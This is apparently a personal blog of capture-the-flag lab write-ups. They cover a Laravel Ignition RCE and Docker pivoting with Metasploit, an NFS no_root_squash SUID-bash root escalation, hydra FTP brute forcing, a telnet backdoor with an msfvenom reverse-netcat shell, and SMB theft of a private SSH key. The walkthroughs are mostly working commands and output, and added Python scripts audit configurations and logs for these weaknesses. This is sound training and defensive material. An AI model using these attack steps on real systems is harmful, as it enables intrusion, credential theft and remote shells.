learningcyber-tom
LearningCyber.tom
6 posts
Personal blog documenting my progress learning Cyber Security
learningcyber-tom · 3 years ago
Advent of Cyber 2022, Day 9: Pivoting
Deploy the attached VM, and wait a few minutes. What ports are open?
Run a quick nmap scan:
nmap -sV -sC -F 10.10.98.22
-sV: probe open ports to determine service/version info
-sC: a simple script scan using the default set of scripts
-F: fast scan (scans fewer ports than the default)
80
What framework is the web application developed with?
This info is at the bottom of the webpage.
laravel
What CVE is the application vulnerable to?
In Metasploit this is listed in the info section of the exploit module.
CVE-2021-3129
What command can be used to upgrade the last opened session to a Meterpreter session?
sessions -u -1
What file indicates a session has been opened within a Docker container?
/.dockerenv
What file often contains useful credentials for web applications?
.env
What database table contains useful credentials?
users
What is Santa's password?
p4$$w0rd
What ports are open on the host machine?

What is the root flag?
Pivot! Steps
Launch Metasploit:
msfconsole
search laravel
Matching Modules
#  Name                                              Disclosure Date  Rank       Check  Description
-  ----                                              ---------------  ----       -----  -----------
0  exploit/unix/http/laravel_token_unserialize_exec  2018-08-07       excellent  Yes    PHP Laravel Framework token Unserialize Remote Command Execution
1  exploit/multi/php/ignition_laravel_debug_rce      2021-01-13       excellent  Yes    Unauthenticated remote code execution in Ignition
info 1
Description: Ignition before 2.5.2, as used in Laravel and other products, allows unauthenticated remote attackers to execute arbitrary code because of insecure usage of file_get_contents() and file_put_contents(). This is exploitable on sites using debug mode with Laravel before 8.4.2.
use 1
msf6 exploit(multi/php/ignition_laravel_debug_rce) > set RHOSTS 10.10.98.22
RHOSTS => 10.10.98.22
check
[*] Checking component version to 10.10.98.22:80
[+] 10.10.98.22:80 - The target appears to be vulnerable.
To summarise what has happened so far: after a little enumeration with nmap and a look at the website, we know port 80 is open and the site is built with Laravel.
Next we launch Metasploit, search for Laravel exploits, check that the target is suitable, then run the exploit.
show targets
This shows what targets are suitable for this exploit.
set LHOST 10.10.94.167
ip a will tell you your IP address.
run
Command shell session 1 opened (10.10.94.167:4444 -> 10.10.98.22:50682) at 2022-12-14 11:22:47 +0000
whoami
www-data
We have a shell! What we need now is to upgrade it to Meterpreter, so:
background
sessions
Active sessions
Id  Name   Type      Information  Connection
--  ----   ----      -----------  ----------
1   shell  cmd/unix               10.10.94.167:4444 -> 10.10.98.22:50682 (10.10.98.22)
sessions -u -1 upgrades the shell to a Meterpreter session.
Then to use it: sessions -i 2 (-i means interact).
We now have our Meterpreter shell; time to get a native shell:
shell
env shows the environment:
USER=www-data
HOME=/var/www
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/system/bin:/system/sbin:/system/xbin
LANG=C
PWD=/var/www/html
cd /var/www
ls -la
ls -la gives a long-format list (permissions, ownership, size and modification date) of all files, hidden ones included:
total 324
drwxr-xr-x 1 www-data www-data   4096 Sep 13 19:39 .
drwxr-xr-x 1 root     root       4096 Sep 13 09:45 ..
-rw-r--r-- 1 503      staff       868 Sep 12 17:08 .env
drwxr-xr-x 1 www-data www-data   4096 Sep 13 16:55 app
-rwxr-xr-x 1 www-data www-data   1686 Sep 11 00:44 artisan
drwxr-xr-x 1 www-data www-data   4096 Sep 13 16:59 bootstrap
-rw-r--r-- 1 www-data www-data   1613 Sep 11 00:44 composer.json
-rw-r--r-- 1 www-data www-data 247888 Sep 11 01:01 composer.lock
drwxr-xr-x 1 www-data www-data   4096 Sep 13 16:55 config
drwxr-xr-x 1 www-data www-data   4096 Sep 13 16:55 database
drwxr-xr-x 2 www-data www-data   4096 Sep 13 16:55 html
-rw-r--r-- 1 www-data www-data    944 Sep 11 00:44 package.json
drwxr-xr-x 1 www-data www-data   4096 Sep 13 16:55 resources
drwxr-xr-x 1 www-data www-data   4096 Sep 13 16:55 routes
-rw-r--r-- 1 www-data www-data    563 Sep 11 00:44 server.php
drwxr-xr-x 1 www-data www-data   4096 Sep 13 16:59 storage
drwxr-xr-x 1 www-data www-data   4096 Sep 13 17:04 vendor
-rw-r--r-- 1 www-data www-data    559 Sep 11 01:14 webpack.mix.js
We've been told the .env file in Docker containers has all the good stuff, so:
cat .env
APP_NAME=Laravel
APP_ENV=local
APP_KEY=base64:NEMESCXelEv2iYzbgq3N30b9IAnXzQmR7LnSzt70rso=
APP_DEBUG=true
APP_URL=http://localhost

LOG_CHANNEL=stack
LOG_LEVEL=debug

This is what we want:
DB_CONNECTION=pgsql
DB_HOST=webservice_database
DB_PORT=5432
DB_DATABASE=postgres
DB_USERNAME=postgres
DB_PASSWORD=postgres

BROADCAST_DRIVER=log
CACHE_DRIVER=file
QUEUE_CONNECTION=sync
SESSION_DRIVER=file
SESSION_LIFETIME=120

REDIS_HOST=127.0.0.1
REDIS_PASSWORD=null
REDIS_PORT=6379

MAIL_MAILER=smtp
MAIL_HOST=smtp.mailtrap.io
MAIL_PORT=2525
MAIL_USERNAME=null
MAIL_PASSWORD=null
MAIL_ENCRYPTION=null
MAIL_FROM_ADDRESS=null
MAIL_FROM_NAME="${APP_NAME}"

AWS_ACCESS_KEY_ID=
AWS_SECRET_ACCESS_KEY=
AWS_DEFAULT_REGION=us-east-1
AWS_BUCKET=

PUSHER_APP_ID=
PUSHER_APP_KEY=
PUSHER_APP_SECRET=
PUSHER_APP_CLUSTER=mt1

MIX_PUSHER_APP_KEY="${PUSHER_APP_KEY}"
MIX_PUSHER_APP_CLUSTER="${PUSHER_APP_CLUSTER}"
Useful info: the database is at webservice_database, username postgres, password postgres.
We need to find out where webservice_database is. To do this, exit to get back to Meterpreter, then:
resolve webservice_database
Host resolutions
Hostname             IP Address
--------             ----------
webservice_database  172.28.101.51
Create a shell again with shell. This shell doesn't have much usability, however we are given the info that 172.17.0.1 is a very likely address for the machine controlling the Docker containers. The two IP addresses we now have can only be reached from within the Docker container.
At this point it's worth noting that you can upload tools such as nmap onto the container and use them from there, but this is inefficient and prone to failure.
This is where we PIVOT: route the traffic from our machine through RHOST.
Exit back to Meterpreter, then background it.
Now we need to set up our port forwarding, or pivoting, in Metasploit using the route command.
route -h shows all the options.
route add 172.28.101.51/32 2
/32 is the subnet mask for a single IP address (I need to look into subnets). The 2 on the end is session 2, our Meterpreter session (the upgrade of the initial shell session), and
route add 172.17.0.1/32 2
so both of these addresses will be routed through our original host.
route print lets us check all is well.
Time to access the database.
search postgres
We will use schemadump:
use 16
msf6 auxiliary(scanner/postgres/postgres_schemadump) > set RHOSTS 172.28.101.51
run
DBName: postgres
Tables:
  TableName: users_id_seq
  Columns:
    ColumnName: last_value  ColumnType: int8  ColumnLength: '8'
    ColumnName: log_cnt  ColumnType: int8  ColumnLength: '8'
    ColumnName: is_called  ColumnType: bool  ColumnLength: '1'
  TableName: users
  Columns:
    ColumnName: id  ColumnType: int4  ColumnLength: '4'
    ColumnName: username  ColumnType: varchar  ColumnLength: "-1"
    ColumnName: password  ColumnType: varchar  ColumnLength: "-1"
    ColumnName: created_at  ColumnType: timestamp  ColumnLength: '8'
    ColumnName: deleted_at  ColumnType: timestamp  ColumnLength: '8'
  TableName: users_pkey
  Columns:
    ColumnName: id  ColumnType: int4  ColumnLength: '4'
Now we need to look at the table and pull info off it.
search postgres
The server generic query module looks promising.
use 11
info
set RHOSTS
set DATABASE postgres (this is from the info we've enumerated so far)
set SQL "select * from users" (this asks for every row and column in the users table)
run
id  username  password  created_at                  deleted_at
--  --------  --------  ----------                  ----------
1   santa     p4$$w0rd  2022-09-13 19:39:51.669279  NIL
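Added example, not part of the original post or of the TryHackMe room: a Python check that reads a Laravel .env like the one recovered above, plus the rows pulled from the users table, and flags the three things that made this chain work: APP_DEBUG=true (the module info above says the CVE is only exploitable in debug mode), a database password identical to its username, and a password stored in plaintext. The sample .env and user rows are constructed from the values on the page; the second user row is an invented bcrypt-style hash so there is a passing case to compare against.

```python
# Added example (not from the original post): audit a Laravel .env and a dumped
# users table for the weaknesses seen in the writeup. Samples are constructed.
import re
from typing import Dict, List

ENV_SAMPLE = """\
APP_NAME=Laravel
APP_ENV=local
APP_KEY=base64:NEMESCXelEv2iYzbgq3N30b9IAnXzQmR7LnSzt70rso=
APP_DEBUG=true
APP_URL=http://localhost
DB_CONNECTION=pgsql
DB_HOST=webservice_database
DB_PORT=5432
DB_USERNAME=postgres
DB_PASSWORD=postgres
REDIS_PASSWORD=null
MAIL_PASSWORD=null
MAIL_FROM_NAME="${APP_NAME}"
"""

# Rows as "select * from users" returned them; the second row is a constructed
# bcrypt-style value so the check has something that should pass.
USERS_SAMPLE = [
    {"id": 1, "username": "santa", "password": "p4$$w0rd"},
    {"id": 2, "username": "elf", "password": "$2y$10$" + "a" * 53},
]

# bcrypt ($2a/$2b/$2y, 60 chars) and argon2 formats that Laravel's Hash facade produces
HASH_RE = re.compile(r"^\$2[aby]\$\d{2}\$[./A-Za-z0-9]{53}$|^\$argon2(i|id)\$")


def parse_env(text: str) -> Dict[str, str]:
    """Parse KEY=VALUE lines, skipping blanks and comments; strips surrounding quotes."""
    env: Dict[str, str] = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or "=" not in line:
            continue
        key, _, value = line.partition("=")
        env[key.strip()] = value.strip().strip('"')
    return env


def audit_env(env: Dict[str, str]) -> Dict[str, str]:
    """Return {setting: why it matters} for each risky value found."""
    findings: Dict[str, str] = {}
    if env.get("APP_DEBUG", "false").lower() == "true":
        findings["APP_DEBUG"] = ("debug mode is on; the Ignition RCE used in the writeup "
                                 "only works against Laravel sites running in debug mode")
    if env.get("DB_USERNAME") and env.get("DB_USERNAME") == env.get("DB_PASSWORD"):
        findings["DB_PASSWORD"] = "database password is identical to the username"
    for key, value in env.items():
        # null/empty *_PASSWORD means the app sends no credential to that service
        if key.endswith("_PASSWORD") and key not in findings and value.lower() in ("", "null"):
            findings[key] = "no credential configured; confirm the service itself enforces authentication"
    return findings


def audit_users(rows: List[Dict[str, str]]) -> List[str]:
    """Return usernames whose stored password is not a recognised password hash."""
    return [r["username"] for r in rows if not HASH_RE.match(r["password"])]


if __name__ == "__main__":
    for key, why in audit_env(parse_env(ENV_SAMPLE)).items():
        print(f"[.env] {key}: {why}")
    for user in audit_users(USERS_SAMPLE):
        print(f"[users] {user}: password stored in plaintext")
```

Run against the page's values this reports APP_DEBUG, DB_PASSWORD, REDIS_PASSWORD and MAIL_PASSWORD from the .env, and santa as the one account whose password is not hashed. The same parse_env function can be pointed at a real .env on a box you administer; the checks are deliberately prefix-based so they do not depend on any Laravel library being installed.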
We have some credentials; time to get to the host. We need to set up a SOCKS proxy to route all our traffic through our 'johnny', so:
search socks
use 0
msf6 auxiliary(server/socks_proxy) >
Make a note of the port being used (1080).
msf6 auxiliary(server/socks_proxy) > run
jobs checks it's running.
In a new tab: Metasploit should now be routing traffic from Kali through the proxy we set up.
curl --proxy socks5://127.0.0.1:1080 http://172.17.0.1
curl transfers data from or to a server and supports most protocols, including HTTP, FTP and POP3.
This works.
Now to use proxychains (vim wasn't working so I used nano):
nano /etc/proxychains4.conf
Scroll to the bottom, and like when using this previously, set it to socks5 and set the port to 1080. Now all traffic should route through what we set up in Metasploit.
We can now use proxychains, but when using nmap we have to turn off ping (-Pn) to get it to work:
proxychains nmap -F -sV -sT -Pn 172.17.0.1
This went down and I lost my shell; as this is my third attempt, I'm adding what the video shows from now on as I've gotta go.
nmap shows ports 22 and 80 open.
I've redone this and got it working without crashing.
Port 22 is SSH, so using Metasploit:
search ssh_login
use 0
set RHOSTS 172.17.0.1
set USERNAME santa
set PASSWORD p4$$w0rd
run
Then, when this completes:
sessions
We can see there is a new session 3.
sessions -i 3
ls
This shows us flag.txt.
cat flag.txt
We have our flag.
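Added example, not from the original post: what the pivot above looks like from the Docker host's side. The final step is an SSH login as santa that arrives from inside the container network rather than from a workstation, and that is the signal a defender can alert on. This Python snippet parses auth.log-style sshd lines and flags any login attempt whose source address falls in a container network. The log lines are constructed; the network list is an assumption (172.17.0.0/16 is Docker's default bridge, 172.28.0.0/16 covers the container address resolved above).

```python
# Added example (not from the original post): flag SSH logins sourced from
# container networks. Log lines and the network list are constructed for the demo.
import ipaddress
import re
from typing import List, NamedTuple

# Assumed container ranges: Docker's default bridge and the room's 172.28.x network.
CONTAINER_NETWORKS = [ipaddress.ip_network(n) for n in ("172.17.0.0/16", "172.28.0.0/16")]

AUTH_LOG_SAMPLE = """\
Dec 14 11:40:02 host sshd[2211]: Accepted password for santa from 172.17.0.2 port 51022 ssh2
Dec 14 11:41:10 host sshd[2230]: Accepted publickey for admin from 10.10.94.167 port 40110 ssh2
Dec 14 11:42:00 host sshd[2244]: Failed password for santa from 172.28.101.51 port 51030 ssh2
Dec 14 11:42:30 host sshd[2250]: Failed password for invalid user guest from 172.17.0.3 port 51040 ssh2
Dec 14 11:43:05 host cron[2260]: (root) CMD (run-parts /etc/cron.hourly)
"""

# Matches both "Accepted <method> for <user>" and "Failed <method> for [invalid user] <user>"
SSHD_RE = re.compile(
    r"sshd\[\d+\]: (?P<result>Accepted|Failed) (?P<method>\w+) for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<ip>[\d.]+) port \d+"
)


class Login(NamedTuple):
    result: str
    method: str
    user: str
    ip: str


def parse_sshd(text: str) -> List[Login]:
    """Extract login attempts from auth.log-style lines; lines from other daemons are ignored."""
    logins = []
    for line in text.splitlines():
        m = SSHD_RE.search(line)
        if m:
            logins.append(Login(m["result"], m["method"], m["user"], m["ip"]))
    return logins


def from_container_network(ip: str) -> bool:
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in CONTAINER_NETWORKS)


def pivot_logins(text: str) -> List[Login]:
    """Every SSH attempt, successful or not, whose source is a container network."""
    return [l for l in parse_sshd(text) if from_container_network(l.ip)]


def successful_pivots(text: str) -> List[str]:
    """'user@ip' for accepted logins from container networks; each one needs an explanation."""
    return [f"{l.user}@{l.ip}" for l in pivot_logins(text) if l.result == "Accepted"]


if __name__ == "__main__":
    for login in pivot_logins(AUTH_LOG_SAMPLE):
        print(f"{login.result:8} {login.method:9} {login.user}@{login.ip}")
    print("successful pivots:", successful_pivots(AUTH_LOG_SAMPLE))
```

On the sample the admin login from 10.10.94.167 is ignored and three attempts from container addresses are reported, with santa@172.17.0.2 the one that succeeded. A web container normally has no business opening SSH sessions to its host, so even the failed attempts are worth a ticket; the cheapest mitigation is to not let sshd on the host listen on the docker0 address at all.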
learningcyber-tom · 3 years ago
Enumerating NFS
nmap -A -p- 10.10.243.201
Time passes…
7 ports open; port 2049 is the NFS port.
/usr/sbin/showmount -e 10.10.224.104
This shows the visible share /home on the target machine.
mkdir /tmp/mount creates a directory on the local machine to mount the share to.
sudo mount -t nfs 10.10.224.104:home /tmp/mount -nolock
cd /tmp
cd mount
ls
cappucino is the folder inside the share.
cd cappucino
ls not working
find lists the files in the home folder.
The .ssh folder has the keys for remote access; id_rsa is the private key.
cd .ssh
cp id_rsa /root
copies the key to our home folder.
chmod 600 id_rsa
sets the key's permissions to owner read/write only, which ssh requires before it will use the key.
ssh -i id_rsa [email protected]
This logs us into the machine.
Exploiting NFS
The NFS share's root squash setting is what matters here: root squash is the option that strips root's special permissions on a share, and because this export does not squash root, files we own as root on our mount are root-owned on the target too.
To gain root access, get to the mount point.
Download the bash executable to the NFS share.
Set the shell to be owned by root:
sudo chown root bash
Add the SUID bit (file permissions rw, etc.):
sudo chmod +s bash makes the file run with its owner's permissions.
sudo chmod +x bash makes the file executable.
ssh into the machine as cappucino:
ssh -i id_rsa [email protected]
ls to see bash
Run bash:
./bash -p (-p keeps the effective privileges we set up instead of dropping them)
cd /root
ls
root.txt
cat root.txt
THM{nfs-got-pwned}
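Added example, not from the original post: the two server-side checks that catch this exploit path, written in Python. The first parses an /etc/exports file and flags entries that disable root squashing or hand read/write access to any host; the second walks an exported tree and lists setuid files, which is how the planted bash binary shows up. The exports text and the directory tree are constructed for the demo (the room's real /etc/exports is not shown on the page); NFS squashes root by default, so an entry without either option is treated as safe.

```python
# Added example (not from the original post): audit NFS exports and scan an
# exported tree for setuid files. Exports text and directory tree are constructed.
import os
import re
import stat
import tempfile
from typing import List, Set, Tuple

EXPORTS_SAMPLE = """\
# constructed sample /etc/exports
/home        *(rw,sync,no_root_squash,no_subtree_check)
/srv/public  10.10.0.0/16(ro,sync,root_squash,no_subtree_check)
/srv/data    10.10.5.0/24(rw,sync,no_subtree_check)
"""

# A client spec is either "host(opt,opt)" or a bare "host" with default options.
CLIENT_RE = re.compile(r"(\S+?)\(([^)]*)\)|(\S+)")

Entry = Tuple[str, str, Set[str]]  # (export path, client spec, option set)


def parse_exports(text: str) -> List[Entry]:
    """One entry per (path, client) pair; comments and blank lines are dropped."""
    entries: List[Entry] = []
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        if not line:
            continue
        parts = re.split(r"\s+", line, 1)
        if len(parts) < 2:
            continue
        path, clients = parts
        for m in CLIENT_RE.finditer(clients):
            if m.group(1):
                entries.append((path, m.group(1), set(m.group(2).split(","))))
            else:
                entries.append((path, m.group(3), set()))
    return entries


def audit_exports(text: str) -> List[Tuple[str, str, str]]:
    """(path, client, reason) for every export entry that weakens the share."""
    findings = []
    for path, client, opts in parse_exports(text):
        if "no_root_squash" in opts:
            findings.append((path, client, "no_root_squash"))  # client root == server root
        if client == "*" and "rw" in opts:
            findings.append((path, client, "rw_to_any_host"))
    return findings


def find_setuid(root: str) -> List[str]:
    """Regular files under root with the setuid bit set; symlinks are not followed."""
    hits = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            st = os.lstat(path)
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                hits.append(path)
    return sorted(hits)


def make_demo_tree() -> str:
    """Constructed stand-in for the exported /home: one setuid file, one plain file."""
    root = tempfile.mkdtemp(prefix="nfs-demo-")
    home = os.path.join(root, "cappucino")
    os.makedirs(home)
    planted = os.path.join(home, "bash")
    with open(planted, "w") as f:
        f.write("#!/bin/sh\n")
    os.chmod(planted, 0o4755)  # setuid + rwxr-xr-x, as in the writeup
    with open(os.path.join(home, "notes.txt"), "w") as f:
        f.write("hello\n")
    return root


if __name__ == "__main__":
    for path, client, reason in audit_exports(EXPORTS_SAMPLE):
        print(f"exports: {path} {client}: {reason}")
    for path in find_setuid(make_demo_tree()):
        print(f"setuid file: {path}")
```

On the sample the /home export is reported twice (no_root_squash and rw to every host) and the planted bash is the single setuid hit. Re-exporting /home with root_squash is the fix for the first; for the second, a periodic setuid scan of user-writable exports, or mounting those paths on the server with nosuid where the workload allows, turns the planted shell into a harmless file.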
learningcyber-tom · 3 years ago
Enumerating FTP
nmap -sT 10.10.142.174
shows ports 21 and 80 open; 21 is FTP.
nmap -A -p21 10.10.142.174
shows the vsftpd version running on the machine, and that anonymous login is allowed.
ftp 10.10.142.174
user: anonymous
password: (no password)
ls
PUBLIC_NOTICE.txt
get PUBLIC_NOTICE.txt
cat PUBLIC_NOTICE.txt on the local machine.
On the local machine:
hydra -t4 -l mike -P /usr/share/wordlists/rockyou.txt -vV 10.10.142.174 ftp
ftp 10.10.142.174
user: mike
password: password
ls
get ftp.txt
cat ftp.txt on the local machine:
THM{y0u_g0t_th3_ftp_fl4g}
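Added example, not from the original post: what the hydra run above leaves behind in vsftpd's own log, and a small Python detector for it. vsftpd writes one line per login attempt; a password-guessing run is a burst of FAIL LOGIN lines for one account from one client, and the tell that matters most is an OK LOGIN for that account right after the burst. The log lines below are constructed in vsftpd's format with invented times and client addresses (anonymous login first, then six failures for mike and a success).

```python
# Added example (not from the original post): detect FTP password guessing in
# vsftpd log lines. The log content is constructed for the demo.
import re
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, List, NamedTuple

VSFTPD_LOG_SAMPLE = """\
Mon Jul 11 10:15:02 2022 [pid 3030] [anonymous] OK LOGIN: Client "10.10.14.5", anon password "?"
Mon Jul 11 10:16:10 2022 [pid 3042] [mike] FAIL LOGIN: Client "10.10.14.5"
Mon Jul 11 10:16:10 2022 [pid 3043] [mike] FAIL LOGIN: Client "10.10.14.5"
Mon Jul 11 10:16:11 2022 [pid 3044] [mike] FAIL LOGIN: Client "10.10.14.5"
Mon Jul 11 10:16:11 2022 [pid 3045] [mike] FAIL LOGIN: Client "10.10.14.5"
Mon Jul 11 10:16:12 2022 [pid 3046] [mike] FAIL LOGIN: Client "10.10.14.5"
Mon Jul 11 10:16:13 2022 [pid 3047] [mike] FAIL LOGIN: Client "10.10.14.5"
Mon Jul 11 10:16:14 2022 [pid 3050] [mike] OK LOGIN: Client "10.10.14.5"
Mon Jul 11 10:30:00 2022 [pid 3101] [mike] FAIL LOGIN: Client "10.10.20.9"
"""

LOGIN_RE = re.compile(
    r'^(?P<ts>\w{3} \w{3} +\d+ \d\d:\d\d:\d\d \d{4}) \[pid \d+\] '
    r'\[(?P<user>[^\]]+)\] (?P<result>OK|FAIL) LOGIN: Client "(?P<client>[\d.]+)"'
)


class Event(NamedTuple):
    time: datetime
    user: str
    ok: bool
    client: str


def parse_vsftpd(text: str) -> List[Event]:
    """Login events only; CONNECT/DOWNLOAD lines and anything unparseable are skipped."""
    events = []
    for line in text.splitlines():
        m = LOGIN_RE.match(line)
        if not m:
            continue
        ts = re.sub(r" +", " ", m["ts"])  # vsftpd pads single-digit days with a space
        when = datetime.strptime(ts, "%a %b %d %H:%M:%S %Y")
        events.append(Event(when, m["user"], m["result"] == "OK", m["client"]))
    return events


def detect_bruteforce(events: List[Event], threshold: int = 5,
                      window: timedelta = timedelta(minutes=1)) -> Dict[str, dict]:
    """Per client: the first burst of >= threshold failures inside `window`, and any
    non-anonymous account that logged in successfully within `window` of the burst."""
    by_client: Dict[str, List[Event]] = defaultdict(list)
    for ev in events:
        by_client[ev.client].append(ev)
    alerts: Dict[str, dict] = {}
    for client, evs in by_client.items():
        evs.sort(key=lambda e: e.time)
        fails = [e for e in evs if not e.ok]
        for i, first in enumerate(fails):
            burst = [f for f in fails[i:] if f.time - first.time <= window]
            if len(burst) < threshold:
                continue
            burst_end = burst[-1].time
            compromised = sorted({e.user for e in evs
                                  if e.ok and e.user != "anonymous"
                                  and burst_end <= e.time <= burst_end + window})
            alerts[client] = {
                "failures": len(burst),
                "users_tried": sorted({f.user for f in burst}),
                "success_after_burst": compromised,
            }
            break
    return alerts


if __name__ == "__main__":
    for client, info in detect_bruteforce(parse_vsftpd(VSFTPD_LOG_SAMPLE)).items():
        print(client, info)
```

On the sample only 10.10.14.5 is reported: six failures for mike inside a minute, followed by a successful login as mike, which is exactly the hydra outcome in the writeup; the single failure from 10.10.20.9 stays below the threshold. The threshold and window are tunable; hydra with -t4 produces far more than five failures per minute, so the defaults are conservative. The usual follow-up is rate limiting or lockout at the FTP server and, for a box like this one, dropping anonymous_enable in vsftpd.conf if anonymous access isn't actually needed.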
learningcyber-tom · 3 years ago
Enumerating and exploiting telnet
Normal nmap scans come back with nothing, so use -p- to scan all ports rather than the default first 1000, with -T4 to speed it up:
nmap -T4 -p- 10.10.107.245
This shows port 8012 open.
nmap -A -p8012 10.10.107.245
The scan of port 8012 shows the text Skidy's Backdoor.
telnet 10.10.107.245 8012
This connects us to the machine via telnet; there is no response echoed when typing.
On the local machine start a tcpdump listener to see if we can ping our machine from telnet:
sudo tcpdump ip proto \\icmp -i eth0
Then send the local machine a ping from telnet:
.RUN ping 10.10.167.83
The ping is received, so now I generate a reverse shell payload with msfvenom:
msfvenom -p cmd/unix/reverse_netcat lhost=10.10.167.83 lport=4444 R
-p: payload
lhost: our local host IP
lport: the port to listen on
R: export the payload in raw format
This generates code on my local machine to copy and paste into telnet after starting a netcat listener:
nc -lvp 4444
In telnet: .RUN and paste the text.
Once the shell is received, type:
ls
cat flag.txt
fin.
learningcyber-tom · 3 years ago
SMB enumeration
11 July 2022
nmap -sS 10.10.241.222
A stealth scan of the IP address, which tells me which ports are open and which are running SMB (Server Message Block).
enum4linux -a 10.10.241.222
This is a full basic enumeration scan, which gives lots of info, including the username cactus and the profiles folder in the shares.
smbclient //10.10.241.222/profiles -U Anonymous
This connects us to the server using the username Anonymous, which shows that the shared folder 'profiles' is accessible anonymously without a password.
ls lists the contents of the folder.
The file 'Working From Home Information.txt' is interesting.
more "Working From Home Information.txt"
Opens the .txt file.
This points us to look at the .ssh directory.
cd .ssh
ls
get id_rsa
downloads the id_rsa private key to my machine.
Open a new tab, so I'm on my own machine:
chmod 600 id_rsa
This changes the permissions of the file, giving me (the owner) read/write only.
ssh -i id_rsa [email protected]
I'm now logged into the target as cactus!
ls
This shows one file, smb.txt.
more smb.txt
reads THM{smb_is_fun_eh?}
fin 
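Added example, not from the original post: the Samba configuration that makes a share readable with an arbitrary username and no password, as 'profiles' was above, and a Python audit for it. Two settings combine to produce that behaviour: guest ok = yes (or its synonym public) on the share, and map to guest in [global], which turns unknown usernames like Anonymous into the guest account. The smb.conf below is constructed for the demo (the room's real configuration is not shown on the page) and also carries an SMB1 minimum-protocol line so the audit has a third thing to report.

```python
# Added example (not from the original post): audit smb.conf for anonymous
# (guest) access and SMB1. The configuration text is constructed for the demo.
import configparser
from typing import List, Tuple

SMB_CONF_SAMPLE = """\
[global]
workgroup = WORKGROUP
map to guest = Bad User
server min protocol = NT1

[profiles]
path = /home/cactus
guest ok = yes
browseable = yes
read only = no

[anonymous]
path = /srv/anon
public = yes

[private]
path = /srv/private
valid users = cactus
"""

# Short codes returned by the audit and what each one means
REASONS = {
    "map_to_guest": "map to guest is not 'Never': unknown usernames fall through to the guest account",
    "smb1_allowed": "server min protocol permits SMB1",
    "guest_access": "share is readable without credentials",
    "guest_writable": "share is writable without credentials",
}

SMB1_PROTOCOLS = {"NT1", "LANMAN1", "LANMAN2", "CORE", "COREPLUS"}


def truthy(value: str) -> bool:
    """smb.conf boolean: yes/true/1 are true, everything else false."""
    return value.strip().lower() in ("yes", "true", "1")


def load_smb_conf(text: str) -> configparser.ConfigParser:
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    cp.read_string(text)
    return cp


def audit_smb_conf(text: str) -> List[Tuple[str, str]]:
    """(section, reason code) for each weakness, in file order."""
    cp = load_smb_conf(text)
    findings: List[Tuple[str, str]] = []
    g = cp["global"] if cp.has_section("global") else {}
    if g.get("map to guest", "never").strip().lower() != "never":
        findings.append(("global", "map_to_guest"))
    if g.get("server min protocol", "").strip().upper() in SMB1_PROTOCOLS:
        findings.append(("global", "smb1_allowed"))
    for section in cp.sections():
        if section == "global":
            continue
        s = cp[section]
        # 'public' is Samba's synonym for 'guest ok'
        if not (truthy(s.get("guest ok", "no")) or truthy(s.get("public", "no"))):
            continue
        findings.append((section, "guest_access"))
        # 'writable'/'writeable' are synonyms for 'read only = no'; default is read-only
        writable = (truthy(s.get("writable", "no")) or truthy(s.get("writeable", "no"))
                    or not truthy(s.get("read only", "yes")))
        if writable:
            findings.append((section, "guest_writable"))
    return findings


if __name__ == "__main__":
    for section, code in audit_smb_conf(SMB_CONF_SAMPLE):
        print(f"[{section}] {REASONS[code]}")
```

On the sample the audit reports map to guest and SMB1 under [global], guest access plus guest-writable for profiles, and guest access for anonymous; private, which restricts access with valid users, is clean. The point the writeup demonstrates is that a readable guest share holding a user's .ssh directory is as good as that user's password; setting guest ok = no on profiles, or leaving map to guest at Never, stops the smbclient -U Anonymous step before it starts.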